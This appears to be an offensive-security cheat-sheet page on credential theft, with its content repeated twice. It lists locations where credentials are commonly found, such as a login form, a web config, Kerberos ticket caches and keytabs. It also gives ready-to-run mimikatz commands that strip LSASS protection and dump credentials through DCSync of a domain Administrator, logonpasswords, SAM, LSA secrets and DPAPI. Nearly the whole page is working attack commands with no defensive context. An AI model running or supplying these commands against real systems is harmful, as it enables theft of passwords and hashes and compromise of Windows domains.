Credentials

C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::sam"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::secrets"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::dpapi"exit

/opt/web.yml

/tmp/krb5cc_alice

/etc/krb5.keytab

Last updated 1 year ago

C:\program files\xxx\mail.ps1

C:\inetpub\wwwroot\loginform.aspx

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "lsadump::dcsync /domain:red.com /user:red\Administrator"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::logonpasswords"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::sam"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "token::elevate" "lsadump::secrets"exit

mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe  /remove" "sekurlsa::dpapi"exit

/opt/web.yml

/tmp/krb5cc_alice

/etc/krb5.keytab

Last updated 1 year ago